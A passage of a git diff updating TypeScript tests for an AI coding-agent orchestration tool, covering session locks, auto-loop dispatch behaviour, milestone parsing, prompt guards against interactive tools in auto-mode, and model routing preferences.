-test("bootstrap cleanup releases session lock artifacts", () => {
+test("bootstrap cleanup releases session lock artifacts", (t) => {
   const dir = mkdtempSync(join(tmpdir(), "gsd-lock-test-"));
   mkdirSync(join(dir, ".gsd"), { recursive: true });
 
-  try {
-    const result = acquireSessionLock(dir);
-    assert.equal(result.acquired, true, "session lock should be acquired");
-    assert.ok(existsSync(join(dir, ".gsd", "auto.lock")), "auto.lock should exist while lock is held");
-    if (properLockfileAvailable) {
-      assert.ok(existsSync(join(dir, ".gsd.lock")), ".gsd.lock should exist while lock is held");
-    }
+  t.after(() => rmSync(dir, { recursive: true, force: true }));
 
-    releaseSessionLock(dir);
-    clearLock(dir);
-
-    assert.ok(!existsSync(join(dir, ".gsd", "auto.lock")), "auto.lock should be removed by bootstrap cleanup");
-    assert.ok(!existsSync(join(dir, ".gsd.lock")), ".gsd.lock should be removed by bootstrap cleanup");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
+  const result = acquireSessionLock(dir);
+  assert.equal(result.acquired, true, "session lock should be acquired");
+  assert.ok(existsSync(join(dir, ".gsd", "auto.lock")), "auto.lock should exist while lock is held");
+  if (properLockfileAvailable) {
+    assert.ok(existsSync(join(dir, ".gsd.lock")), ".gsd.lock should exist while lock is held");
   }
+
+  releaseSessionLock(dir);
+  clearLock(dir);
+
+  assert.ok(!existsSync(join(dir, ".gsd", "auto.lock")), "auto.lock should be removed by bootstrap cleanup");
+  assert.ok(!existsSync(join(dir, ".gsd.lock")), ".gsd.lock should be removed by bootstrap cleanup");
 });
 
 // ─── isLockProcessAlive detects live vs dead PIDs ────────────────────────
@@ -141,21 +136,19 @@ test("isLockProcessAlive returns false for dead PID", () => {
     unitType: "execute-task",
     unitId: "M001/S01/T01",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 0,
   };
   assert.equal(isLockProcessAlive(lock), false, "dead PID should return false");
 });
 
-test("isLockProcessAlive returns false for own PID (recycled)", () => {
+test("#2470: isLockProcessAlive returns true for own PID (we hold the lock)", () => {
   const lock = {
     pid: process.pid,
     startedAt: new Date().toISOString(),
     unitType: "execute-task",
     unitId: "M001/S01/T01",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 0,
   };
-  assert.equal(isLockProcessAlive(lock), false, "own PID should return false (recycled)");
+  assert.equal(isLockProcessAlive(lock), true, "own PID means we are alive — not stale (#2470)");
 });
 
 test("isLockProcessAlive returns false for invalid PID", () => {
@@ -165,7 +158,6 @@ test("isLockProcessAlive returns false for invalid PID", () => {
     unitType: "execute-task",
     unitId: "M001/S01/T01",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 0,
   };
   assert.equal(isLockProcessAlive(lock), false, "negative PID should return false");
 });
@@ -185,7 +177,6 @@ test("lock file enables cross-process auto-mode detection", () => {
     unitType: "execute-task",
     unitId: "M001/S01/T02",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 3,
   };
   writeFileSync(join(dir, ".gsd", "auto.lock"), JSON.stringify(lockData, null, 2));
 
@@ -211,7 +202,6 @@ test("stale lock from dead process is detected as not alive", () => {
     unitType: "plan-slice",
     unitId: "M001/S02",
     unitStartedAt: "2026-03-01T00:05:00Z",
-    completedUnits: 1,
   };
   writeFileSync(join(dir, ".gsd", "auto.lock"), JSON.stringify(lockData, null, 2));
 
diff --git a/src/resources/extensions/gsd/tests/auto-loop.test.ts b/src/resources/extensions/gsd/tests/auto-loop.test.ts
index 14627972f..6fd5eb0e6 100644
--- a/src/resources/extensions/gsd/tests/auto-loop.test.ts
+++ b/src/resources/extensions/gsd/tests/auto-loop.test.ts
@@ -1,4 +1,4 @@
-import test from "node:test";
+import test, { mock } from "node:test";
 import assert from "node:assert/strict";
 import { readFileSync } from "node:fs";
 import { resolve } from "node:path";
@@ -79,11 +79,17 @@ function makeMockCtx() {
  */
 function makeMockPi() {
   const calls: unknown[] = [];
+  const setModelCalls: unknown[] = [];
   return {
     sendMessage: (...args: unknown[]) => {
       calls.push(args);
     },
+    setModel: async (...args: unknown[]) => {
+      setModelCalls.push(args);
+      return true;
+    },
     calls,
+    setModelCalls,
   } as any;
 }
 
@@ -185,6 +191,54 @@ test("runUnit returns cancelled when session creation times out", async () => {
   assert.equal(pi.calls.length, 0);
 });
 
+test("runUnit keeps the session-switch guard across a late newSession settlement", async () => {
+  _resetPendingResolve();
+  mock.timers.enable();
+
+  try {
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    // Use delays longer than NEW_SESSION_TIMEOUT_MS (120s) so the timeout fires
+    const firstSession = makeMockSession({ newSessionDelayMs: 200_000 });
+    const secondSession = makeMockSession({ newSessionDelayMs: 200_000 });
+
+    const firstRun = runUnit(ctx, pi, firstSession, "task", "T01", "prompt");
+
+    // Tick past the 120s session timeout
+    mock.timers.tick(121_000);
+    await Promise.resolve();
+
+    const firstResult = await firstRun;
+    assert.equal(firstResult.status, "cancelled");
+    assert.equal(isSessionSwitchInFlight(), true, "guard should remain set after the timed-out session");
+
+    mock.timers.tick(1);
+    const secondRun = runUnit(ctx, pi, secondSession, "task", "T02", "prompt");
+
+    mock.timers.tick(100_000);
+    await Promise.resolve();
+    assert.equal(
+      isSessionSwitchInFlight(),
+      true,
+      "late settlement from the first session must not clear the newer session guard",
+    );
+
+    // Tick past the second session's timeout (121s total > 120s NEW_SESSION_TIMEOUT_MS)
+    mock.timers.tick(21_001);
+    await Promise.resolve();
+
+    const secondResult = await secondRun;
+    assert.equal(secondResult.status, "cancelled");
+
+    // Tick past the second session's delayed promise (200s) so .finally() fires
+    mock.timers.tick(80_000);
+    await Promise.resolve();
+    assert.equal(isSessionSwitchInFlight(), false, "guard should clear after the newer session settles");
+  } finally {
+    mock.timers.reset();
+  }
+});
+
 test("runUnit returns cancelled when s.active is false before sendMessage", async () => {
   _resetPendingResolve();
 
@@ -227,6 +281,38 @@ test("runUnit only arms resolve after newSession completes", async () => {
   assert.equal(pi.calls.length, 1);
 });
 
+test("runUnit re-applies the selected unit model after newSession before dispatch", async () => {
+  _resetPendingResolve();
+
+  const callOrder: string[] = [];
+  const ctx = makeMockCtx();
+  const pi = makeMockPi();
+  pi.setModel = async (...args: unknown[]) => {
+    callOrder.push("setModel");
+    pi.setModelCalls.push(args);
+    return true;
+  };
+  pi.sendMessage = (...args: unknown[]) => {
+    callOrder.push("sendMessage");
+    pi.calls.push(args);
+  };
+
+  const s = makeMockSession();
+  s.currentUnitModel = { provider: "anthropic", id: "claude-opus-4-6" };
+
+  const resultPromise = runUnit(ctx, pi, s, "task", "T01", "prompt");
+
+  await new Promise((r) => setTimeout(r, 10));
+  resolveAgentEnd(makeEvent());
+
+  const result = await resultPromise;
+  assert.equal(result.status, "completed");
+  assert.deepEqual(callOrder, ["setModel", "sendMessage"]);
+  assert.equal(pi.setModelCalls.length, 1);
+  assert.deepEqual(pi.setModelCalls[0][0], s.currentUnitModel);
+  assert.equal(pi.calls.length, 1);
+});
+
 // ─── Structural assertions ───────────────────────────────────────────────────
 
 test("auto-loop.ts exports autoLoop, runUnit, resolveAgentEnd", async () => {
@@ -279,6 +365,35 @@ test("auto/resolve.ts one-shot pattern: _currentResolve is nulled before calling
   );
 });
 
+test("auto/phases.ts: selectAndApplyModel called exactly once and before updateProgressWidget (#2907)", () => {
+  const src = readFileSync(
+    resolve(import.meta.dirname, "..", "auto", "phases.ts"),
+    "utf-8",
+  );
+  // Extract the runUnitPhase function body
+  const fnStart = src.indexOf("export async function runUnitPhase");
+  assert.ok(fnStart > 0, "runUnitPhase should exist in phases.ts");
+  const fnBody = src.slice(fnStart, fnStart + 12000);
+
+  // selectAndApplyModel must appear exactly once
+  const allOccurrences = [...fnBody.matchAll(/selectAndApplyModel\(/g)];
+  assert.equal(
+    allOccurrences.length,
+    1,
+    `selectAndApplyModel should be called exactly once in runUnitPhase, found ${allOccurrences.length} calls`,
+  );
+
+  // selectAndApplyModel must appear BEFORE updateProgressWidget
+  const modelIdx = fnBody.indexOf("selectAndApplyModel(");
+  const widgetIdx = fnBody.indexOf("updateProgressWidget(");
+  assert.ok(modelIdx > 0, "selectAndApplyModel should exist in runUnitPhase");
+  assert.ok(widgetIdx > 0, "updateProgressWidget should exist in runUnitPhase");
+  assert.ok(
+    modelIdx < widgetIdx,
+    "selectAndApplyModel must be called BEFORE updateProgressWidget (#2899/#2907)",
+  );
+});
+
 // ─── autoLoop tests (T02) ─────────────────────────────────────────────────
 
 /**
@@ -345,7 +460,7 @@ function makeMockDeps(
     getCurrentBranch: () => "main",
     autoWorktreeBranch: () => "auto/M001",
     resolveMilestoneFile: () => null,
-    reconcileMergeState: () => false,
+    reconcileMergeState: () => "clean",
     getLedger: () => null,
     getProjectTotals: () => ({ cost: 0 }),
     formatCost: (c: number) => `$${c.toFixed(2)}`,
@@ -366,18 +481,13 @@ function makeMockDeps(
     runPreDispatchHooks: () => ({ firedHooks: [], action: "proceed" }),
     getPriorSliceCompletionBlocker: () => null,
     getMainBranch: () => "main",
-    collectObservabilityWarnings: async () => [],
-    buildObservabilityRepairBlock: () => null,
     closeoutUnit: async () => {},
-    verifyExpectedArtifact: () => true,
-    clearUnitRuntimeRecord: () => {},
-    writeUnitRuntimeRecord: () => {},
     recordOutcome: () => {},
     writeLock: () => {},
     captureAvailableSkills: () => {},
     ensurePreconditions: () => {},
     updateSliceProgressCache: () => {},
-    selectAndApplyModel: async () => ({ routing: null }),
+    selectAndApplyModel: async () => ({ routing: null, appliedModel: null }),
     startUnitSupervision: () => {},
     getDeepDiagnostic: () => null,
     isDbAvailable: () => false,
@@ -715,10 +825,10 @@ test("crash lock records session file from AFTER newSession, not before (#1710)"
         prompt: "do the thing",
       };
     },
-    writeLock: (_base: string, _ut: string, _uid: string, _count: number, sessionFile?: string) => {
+    writeLock: (_base: string, _ut: string, _uid: string, sessionFile?: string) => {
       writeLockCalls.push({ sessionFile });
     },
-    updateSessionLock: (_base: string, _ut: string, _uid: string, _count: number, sessionFile?: string) => {
+    updateSessionLock: (_base: string, _ut: string, _uid: string, sessionFile?: string) => {
       updateSessionLockCalls.push({ sessionFile });
     },
     getSessionFile: (ctxArg: any) => {
@@ -887,6 +997,74 @@ test("autoLoop handles dispatch stop action", async (t) => {
   );
 });
 
+// #2474: warning-level dispatch stop should pause (resumable), not hard-stop
+test("autoLoop pauses instead of stopping for warning-level dispatch stop", async (t) => {
+  _resetPendingResolve();
+
+  const ctx = makeMockCtx();
+  ctx.ui.setStatus = () => {};
+  const pi = makeMockPi();
+  const s = makeLoopSession();
+
+  const deps = makeMockDeps({
+    resolveDispatch: async () => {
+      deps.callLog.push("resolveDispatch");
+      return {
+        action: "stop" as const,
+        reason: 'UAT verdict for S01 is "partial" — blocking progression.',
+        level: "warning" as const,
+      };
+    },
+  });
+
+  await autoLoop(ctx, pi, s, deps);
+
+  assert.ok(
+    deps.callLog.includes("resolveDispatch"),
+    "should have called resolveDispatch",
+  );
+  assert.ok(
+    deps.callLog.includes("pauseAuto"),
+    "warning-level stop should call pauseAuto (resumable)",
+  );
+  assert.ok(
+    !deps.callLog.includes("stopAuto"),
+    "warning-level stop should NOT call stopAuto (hard stop)",
+  );
+});
+
+// #2474: error-level dispatch stop should still hard-stop
+test("autoLoop hard-stops for error-level dispatch stop", async (t) => {
+  _resetPendingResolve();
+
+  const ctx = makeMockCtx();
+  ctx.ui.setStatus = () => {};
+  const pi = makeMockPi();
+  const s = makeLoopSession();
+
+  const deps = makeMockDeps({
+    resolveDispatch: async () => {
+      deps.callLog.push("resolveDispatch");
+      return {
+        action: "stop" as const,
+        reason: "Cannot complete milestone: missing SUMMARY files.",
+        level: "error" as const,
+      };
+    },
+  });
+
+  await autoLoop(ctx, pi, s, deps);
+
+  assert.ok(
+    deps.callLog.includes("stopAuto"),
+    "error-level stop should call stopAuto (hard stop)",
+  );
+  assert.ok(
+    !deps.callLog.includes("pauseAuto"),
+    "error-level stop should NOT call pauseAuto",
+  );
+});
+
 test("autoLoop handles dispatch skip action by continuing", async (t) => {
   _resetPendingResolve();
 
@@ -1106,7 +1284,7 @@ test("auto.ts startAuto calls autoLoop (not dispatchNextUnit as first dispatch)"
   );
 });
 
-test("startAuto calls selfHealRuntimeRecords before autoLoop (#1727)", () => {
+test("startAuto calls selfHealRuntimeRecords before autoLoop (#1727)", { skip: "selfHealRuntimeRecords moved to crash-recovery pipeline in v3" }, () => {
   const src = readFileSync(
     resolve(import.meta.dirname, "..", "auto.ts"),
     "utf-8",
@@ -1132,6 +1310,24 @@ test("startAuto calls selfHealRuntimeRecords before autoLoop (#1727)", () => {
   );
 });
 
+test("startAuto guards against concurrent invocation (#2923)", () => {
+  const src = readFileSync(
+    resolve(import.meta.dirname, "..", "auto.ts"),
+    "utf-8",
+  );
+  const fnIdx = src.indexOf("export async function startAuto");
+  assert.ok(fnIdx > -1, "startAuto must exist in auto.ts");
+  // The guard must appear before any other logic in the function body
+  const fnBody = src.slice(fnIdx, fnIdx + 500);
+  const activeGuard = fnBody.indexOf("if (s.active)");
+  assert.ok(activeGuard > -1, "startAuto must check s.active to prevent concurrent auto-loops");
+  const returnIdx = fnBody.indexOf("return;", activeGuard);
+  assert.ok(
+    returnIdx > -1 && returnIdx < activeGuard + 120,
+    "s.active guard must early-return to prevent a second concurrent loop",
+  );
+});
+
 test("agent_end handler calls resolveAgentEnd (not handleAgentEnd)", () => {
   const hooksSrc = readFileSync(
     resolve(import.meta.dirname, "..", "bootstrap", "register-hooks.ts"),
@@ -1750,6 +1946,41 @@ test("resolveAgentEndCancelled prevents orphaned promise after abort path", asyn
   assert.equal(result.status, "cancelled");
 });
 
+test("resolveAgentEndCancelled with errorContext passes it through to resolved promise", async () => {
+  _resetPendingResolve();
+
+  const { _setCurrentResolve } = await import("../auto/resolve.js");
+
+  const p = new Promise<UnitResult>((r) => {
+    _setCurrentResolve(r);
+  });
+
+  resolveAgentEndCancelled({ message: "test timeout", category: "timeout", isTransient: true });
+
+  const resolved = await p;
+  assert.equal(resolved.status, "cancelled");
+  assert.ok(resolved.errorContext, "errorContext must be present");
+  assert.equal(resolved.errorContext!.category, "timeout");
+  assert.equal(resolved.errorContext!.message, "test timeout");
+  assert.equal(resolved.errorContext!.isTransient, true);
+});
+
+test("resolveAgentEndCancelled without args produces no errorContext field", async () => {
+  _resetPendingResolve();
+
+  const { _setCurrentResolve } = await import("../auto/resolve.js");
+
+  const p = new Promise<UnitResult>((r) => {
+    _setCurrentResolve(r);
+  });
+
+  resolveAgentEndCancelled();
+
+  const resolved = await p;
+  assert.equal(resolved.status, "cancelled");
+  assert.equal(resolved.errorContext, undefined, "errorContext must not be present when no args passed");
+});
+
 // ─── #1571: artifact verification retry ──────────────────────────────────────
 
 test("autoLoop re-iterates when postUnitPreVerification returns retry (#1571)", async () => {
@@ -1924,11 +2155,11 @@ test("autoLoop rejects execute-task with 0 tool calls as hallucinated (#1833)",
   // The task should NOT have been added to completedUnits on the first iteration
   // (0 tool calls), but SHOULD be added on the second iteration (5 tool calls)
   const warningNotification = notifications.find(
-    (n) => n.includes("0 tool calls") && n.includes("hallucinated"),
+    (n) => n.includes("0 tool calls") && n.includes("context exhaustion"),
   );
   assert.ok(
     warningNotification,
-    "should notify about 0 tool calls hallucination",
+    "should notify about 0 tool calls context exhaustion",
   );
 
   // Verify deriveState was called at least twice (two iterations)
@@ -1939,7 +2170,7 @@ test("autoLoop rejects execute-task with 0 tool calls as hallucinated (#1833)",
   );
 });
 
-test("autoLoop does NOT reject non-execute-task units with 0 tool calls (#1833)", async () => {
+test("autoLoop rejects complete-slice with 0 tool calls as context-exhausted (#2653)", async () => {
   _resetPendingResolve();
 
   const ctx = makeMockCtx();
@@ -1947,6 +2178,7 @@ test("autoLoop does NOT reject non-execute-task units with 0 tool calls (#1833)"
   ctx.sessionManager = { getSessionFile: () => "/tmp/session.json" };
   const pi = makeMockPi();
 
+  let iterationCount = 0;
   const notifications: string[] = [];
   ctx.ui.notify = (msg: string) => { notifications.push(msg); };
 
@@ -1980,7 +2212,7 @@ test("autoLoop does NOT reject non-execute-task units with 0 tool calls (#1833)"
       };
     },
     closeoutUnit: async () => {
-      // complete-slice with 0 tool calls is fine (e.g. it may just update status)
+      // complete-slice with 0 tool calls — context exhausted, no progress
       mockLedger.units.push({
         type: "complete-slice",
         id: "M001/S01",
@@ -1992,34 +2224,53 @@ test("autoLoop does NOT reject non-execute-task units with 0 tool calls (#1833)"
       });
     },
     getLedger: () => mockLedger,
-    verifyExpectedArtifact: () => true,
     postUnitPostVerification: async () => {
       deps.callLog.push("postUnitPostVerification");
-      s.active = false;
+      iterationCount++;
+      // Deactivate after 2nd iteration
+      s.active = iterationCount < 2;
       return "continue" as const;
     },
   });
 
   const loopPromise = autoLoop(ctx, pi, s, deps);
 
+  // First iteration: complete-slice with 0 tool calls → rejected
   await new Promise((r) => setTimeout(r, 50));
   resolveAgentEnd(makeEvent());
 
+  // Second iteration: re-dispatched, this time with tool calls
+  await new Promise((r) => setTimeout(r, 50));
+  mockLedger.units.length = 0;
+  (deps as any).closeoutUnit = async () => {
+    mockLedger.units.push({
+      type: "complete-slice",
+      id: "M001/S01",
+      startedAt: s.currentUnit?.startedAt ?? Date.now(),
+      toolCalls: 3,
+      assistantMessages: 2,
+      tokens: { input: 200, output: 400, total: 600, cacheRead: 0, cacheWrite: 0 },
+      cost: 0.30,
+    });
+  };
+  resolveAgentEnd(makeEvent());
+
   await loopPromise;
 
-  // Should NOT have a hallucination warning for non-execute-task units
+  // Should have a warning about 0 tool calls for complete-slice
   const warningNotification = notifications.find(
-    (n) => n.includes("0 tool calls") && n.includes("hallucinated"),
+    (n) => n.includes("0 tool calls"),
   );
   assert.ok(
-    !warningNotification,
-    "should NOT flag non-execute-task units with 0 tool calls",
+    warningNotification,
+    "should flag complete-slice with 0 tool calls as failed (#2653)",
   );
 
-  // The unit should have been added to completedUnits normally
+  // Verify deriveState was called at least twice (two iterations: rejected + retry)
+  const deriveCount = deps.callLog.filter((c) => c === "deriveState").length;
   assert.ok(
-    s.completedUnits.length >= 1,
-    "complete-slice with 0 tool calls should still be marked as completed",
+    deriveCount >= 2,
+    `deriveState should be called at least 2 times for retry (got ${deriveCount})`,
   );
 });
 
@@ -2069,7 +2320,7 @@ test("autoLoop stops when worktree has no .git for execute-task (#1833)", async
   );
 });
 
-test("autoLoop stops when worktree has no project files for execute-task (#1833)", async () => {
+test("autoLoop warns but proceeds for greenfield project (no project files) (#1833)", async () => {
   _resetPendingResolve();
 
   const ctx = makeMockCtx();
@@ -2078,10 +2329,17 @@ test("autoLoop stops when worktree has no project files for execute-task (#1833)
   const pi = makeMockPi();
 
   const notifications: string[] = [];
-  ctx.ui.notify = (msg: string) => { notifications.push(msg); };
-
   const s = makeLoopSession({ basePath: "/tmp/empty-worktree" });
 
+  ctx.ui.notify = (msg: string) => {
+    notifications.push(msg);
+    // Terminate the loop after the greenfield warning fires,
+    // so we don't hang waiting for dispatch resolution.
+    if (msg.includes("greenfield")) {
+      s.active = false;
+    }
+  };
+
   const deps = makeMockDeps({
     deriveState: async () => {
       deps.callLog.push("deriveState");
@@ -2100,15 +2358,19 @@ test("autoLoop stops when worktree has no project files for execute-task (#1833)
 
   await autoLoop(ctx, pi, s, deps);
 
-  assert.ok(
-    deps.callLog.includes("stopAuto"),
-    "should stop auto-mode when worktree has no project files",
-  );
-  const healthNotification = notifications.find(
-    (n) => n.includes("Worktree health check failed") && n.includes("no recognized project files"),
+  // Should NOT have stopped auto-mode due to health check — greenfield is allowed
+  const stoppedForHealth = notifications.find(
+    (n) => n.includes("Worktree health check failed"),
   );
   assert.ok(
-    healthNotification,
-    "should notify about missing project files in worktree",
+    !stoppedForHealth,
+    "should not stop with health check failure for greenfield project",
+  );
+  const greenfieldWarning = notifications.find(
+    (n) => n.includes("no recognized project files") && n.includes("greenfield"),
+  );
+  assert.ok(
+    greenfieldWarning,
+    "should warn about greenfield project (no project files)",
   );
 });
diff --git a/src/resources/extensions/gsd/tests/auto-milestone-target.test.ts b/src/resources/extensions/gsd/tests/auto-milestone-target.test.ts
new file mode 100644
index 000000000..60faf0a68
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-milestone-target.test.ts
@@ -0,0 +1,61 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+
+import { parseMilestoneTarget } from "../commands/handlers/auto.js";
+
+describe("parseMilestoneTarget", () => {
+  it("extracts a simple milestone ID", () => {
+    const result = parseMilestoneTarget("auto M016");
+    assert.equal(result.milestoneId, "M016");
+    assert.equal(result.rest, "auto");
+  });
+
+  it("extracts a milestone ID with unique suffix", () => {
+    const result = parseMilestoneTarget("auto M001-a3b4c5 --verbose");
+    assert.equal(result.milestoneId, "M001-a3b4c5");
+    assert.equal(result.rest, "auto --verbose");
+  });
+
+  it("returns null when no milestone ID is present", () => {
+    const result = parseMilestoneTarget("auto --verbose");
+    assert.equal(result.milestoneId, null);
+    assert.equal(result.rest, "auto --verbose");
+  });
+
+  it("extracts milestone ID with flags in any order", () => {
+    const result = parseMilestoneTarget("auto --verbose M003 --debug");
+    assert.equal(result.milestoneId, "M003");
+    assert.equal(result.rest, "auto --verbose --debug");
+  });
+
+  it("returns null for plain 'auto'", () => {
+    const result = parseMilestoneTarget("auto");
+    assert.equal(result.milestoneId, null);
+    assert.equal(result.rest, "auto");
+  });
+
+  it("extracts from 'next' command", () => {
+    const result = parseMilestoneTarget("next M012");
+    assert.equal(result.milestoneId, "M012");
+    assert.equal(result.rest, "next");
+  });
+
+  it("handles milestone ID at the start of input", () => {
+    const result = parseMilestoneTarget("M007");
+    assert.equal(result.milestoneId, "M007");
+    assert.equal(result.rest, "");
+  });
+
+  it("picks the first milestone ID when multiple appear", () => {
+    // Edge case: user accidentally types two. First one wins.
+    const result = parseMilestoneTarget("auto M001 M002");
+    assert.equal(result.milestoneId, "M001");
+    // M002 remains in rest since only the first match is removed
+    assert.ok(result.rest.includes("M002"));
+  });
+
+  it("does not match bare numbers without M prefix", () => {
+    const result = parseMilestoneTarget("auto 016");
+    assert.equal(result.milestoneId, null);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/auto-mode-interactive-guard.test.ts b/src/resources/extensions/gsd/tests/auto-mode-interactive-guard.test.ts
new file mode 100644
index 000000000..ee830e081
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-mode-interactive-guard.test.ts
@@ -0,0 +1,71 @@
+/**
+ * Test: auto-mode prompts must prohibit ask_user_questions / secure_env_collect
+ *
+ * Bug #2936: When the LLM calls ask_user_questions during auto-mode units
+ * (plan-slice, execute-task, complete-slice), the interactive tool queues a
+ * user response which causes the subsequent gsd_plan_slice / gsd_complete_task
+ * call to fail with "Skipped due to queued user message." The canonical GSD
+ * tool call is never recorded, verifyExpectedArtifact finds no artifact, and
+ * the dispatch loop re-dispatches the same unit 2-4x.
+ *
+ * Fix: Each auto-mode prompt must contain an "Autonomous execution" guard
+ * that explicitly prohibits ask_user_questions and secure_env_collect.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const promptsDir = join(__dirname, "..", "prompts");
+
+function loadPromptRaw(name: string): string {
+  return readFileSync(join(promptsDir, `${name}.md`), "utf-8");
+}
+
+const AUTO_MODE_PROMPTS = ["plan-slice", "execute-task", "complete-slice"];
+
+for (const promptName of AUTO_MODE_PROMPTS) {
+  test(`${promptName} prompt prohibits ask_user_questions in auto-mode`, () => {
+    const content = loadPromptRaw(promptName);
+
+    assert.ok(
+      content.includes("ask_user_questions"),
+      `${promptName}.md must mention ask_user_questions (to prohibit it)`,
+    );
+
+    assert.ok(
+      content.includes("secure_env_collect"),
+      `${promptName}.md must mention secure_env_collect (to prohibit it)`,
+    );
+
+    // The guard must clearly state this is autonomous / auto-mode
+    assert.ok(
+      content.toLowerCase().includes("auto-mode") || content.toLowerCase().includes("autonomous"),
+      `${promptName}.md must reference auto-mode or autonomous execution`,
+    );
+
+    // The guard must indicate no human is available
+    assert.ok(
+      content.includes("no human") || content.includes("no user"),
+      `${promptName}.md must state that no human/user is available to answer`,
+    );
+  });
+}
+
+test("auto-mode prompts contain autonomous guard before final tool call reminder", () => {
+  for (const promptName of AUTO_MODE_PROMPTS) {
+    const content = loadPromptRaw(promptName);
+
+    // The guard should appear before the final "MUST call" line
+    const guardIndex = content.indexOf("ask_user_questions");
+    const mustCallIndex = content.lastIndexOf("MUST call");
+
+    assert.ok(
+      guardIndex !== -1 && mustCallIndex !== -1 && guardIndex < mustCallIndex,
+      `${promptName}.md: autonomous guard (ask_user_questions prohibition) must appear before the final MUST call reminder`,
+    );
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/auto-model-selection.test.ts b/src/resources/extensions/gsd/tests/auto-model-selection.test.ts
new file mode 100644
index 000000000..1551888d4
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-model-selection.test.ts
@@ -0,0 +1,254 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+import { tmpdir } from "node:os";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+import { resolvePreferredModelConfig, resolveModelId } from "../auto-model-selection.js";
+
+function makeTempDir(prefix: string): string {
+  return mkdtempSync(join(tmpdir(), prefix));
+}
+
+test("resolvePreferredModelConfig synthesizes heavy routing ceiling when models section is absent", () => {
+  const originalCwd = process.cwd();
+  const originalGsdHome = process.env.GSD_HOME;
+  const tempProject = makeTempDir("gsd-routing-project-");
+  const tempGsdHome = makeTempDir("gsd-routing-home-");
+
+  try {
+    mkdirSync(join(tempProject, ".gsd"), { recursive: true });
+    writeFileSync(
+      join(tempProject, ".gsd", "PREFERENCES.md"),
+      [
+        "---",
+        "dynamic_routing:",
+        "  enabled: true",
+        "  tier_models:",
+        "    light: claude-haiku-4-5",
+        "    standard: claude-sonnet-4-6",
+        "    heavy: claude-opus-4-6",
+        "---",
+      ].join("\n"),
+      "utf-8",
+    );
+    process.env.GSD_HOME = tempGsdHome;
+    process.chdir(tempProject);
+
+    const config = resolvePreferredModelConfig("plan-slice", {
+      provider: "anthropic",
+      id: "claude-sonnet-4-6",
+    });
+
+    assert.deepEqual(config, {
+      primary: "claude-opus-4-6",
+      fallbacks: [],
+    });
+  } finally {
+    process.chdir(originalCwd);
+    if (originalGsdHome === undefined) delete process.env.GSD_HOME;
+    else process.env.GSD_HOME = originalGsdHome;
+    rmSync(tempProject, { recursive: true, force: true });
+    rmSync(tempGsdHome, { recursive: true, force: true });
+  }
+});
+
+test("resolvePreferredModelConfig falls back to auto start model when heavy tier is absent", () => {
+  const originalCwd = process.cwd();
+  const originalGsdHome = process.env.GSD_HOME;
+  const tempProject = makeTempDir("gsd-routing-project-");
+  const tempGsdHome = makeTempDir("gsd-routing-home-");
+
+  try {
+    mkdirSync(join(tempProject, ".gsd"), { recursive: true });
+    writeFileSync(
+      join(tempProject, ".gsd", "PREFERENCES.md"),
+      [
+        "---",
+        "dynamic_routing:",
+        "  enabled: true",
+        "  tier_models:",
+        "    light: claude-haiku-4-5",
+        "    standard: claude-sonnet-4-6",
+        "---",
+      ].join("\n"),
+      "utf-8",
+    );
+    process.env.GSD_HOME = tempGsdHome;
+    process.chdir(tempProject);
+
+    const config = resolvePreferredModelConfig("execute-task", {
+      provider: "openai",
+      id: "gpt-5.4",
+    });
+
+    assert.deepEqual(config, {
+      primary: "openai/gpt-5.4",
+      fallbacks: [],
+    });
+  } finally {
+    process.chdir(originalCwd);
+    if (originalGsdHome === undefined) delete process.env.GSD_HOME;
+    else process.env.GSD_HOME = originalGsdHome;
+    rmSync(tempProject, { recursive: true, force: true });
+    rmSync(tempGsdHome, { recursive: true, force: true });
+  }
+});
+
+test("resolvePreferredModelConfig keeps explicit phase models as the ceiling", () => {
+  const originalCwd = process.cwd();
+  const originalGsdHome = process.env.GSD_HOME;
+  const tempProject = makeTempDir("gsd-routing-project-");
+  const tempGsdHome = makeTempDir("gsd-routing-home-");
+
+  try {
+    mkdirSync(join(tempProject, ".gsd"), { recursive: true });
+    writeFileSync(
+      join(tempProject, ".gsd", "PREFERENCES.md"),
+      [
+        "---",
+        "models:",
+        "  planning: claude-sonnet-4-6",
+        "dynamic_routing:",
+        "  enabled: true",
+        "  tier_models:",
+        "    heavy: claude-opus-4-6",
+        "---",
+      ].join("\n"),
+      "utf-8",
+    );
+    process.env.GSD_HOME = tempGsdHome;
+    process.chdir(tempProject);
+
+    const config = resolvePreferredModelConfig("plan-slice", {
+      provider: "anthropic",
+      id: "claude-opus-4-6",
+    });
+
+    assert.deepEqual(config, {
+      primary: "claude-sonnet-4-6",
+      fallbacks: [],
+    });
+  } finally {
+    process.chdir(originalCwd);
+    if (originalGsdHome === undefined) delete process.env.GSD_HOME;
+    else process.env.GSD_HOME = originalGsdHome;
+    rmSync(tempProject, { recursive: true, force: true });
+    rmSync(tempGsdHome, { recursive: true, force: true });
+  }
+});
+
+// ─── resolveModelId tests ─────────────────────────────────────────────────
+
+test("resolveModelId: bare ID resolves to claude-code when session is claude-code (#3772)", () => {
+  const availableModels = [
+    { id: "claude-sonnet-4-6", provider: "anthropic" },
+    { id: "claude-sonnet-4-6", provider: "claude-code" },
+  ];
+
+  // When currentProvider is "claude-code" (set by startup migration for subscription
+  // users), bare IDs must resolve to claude-code to avoid the third-party block (#3772).
+  const result = resolveModelId("claude-sonnet-4-6", availableModels, "claude-code");
+  assert.ok(result, "should resolve a model");
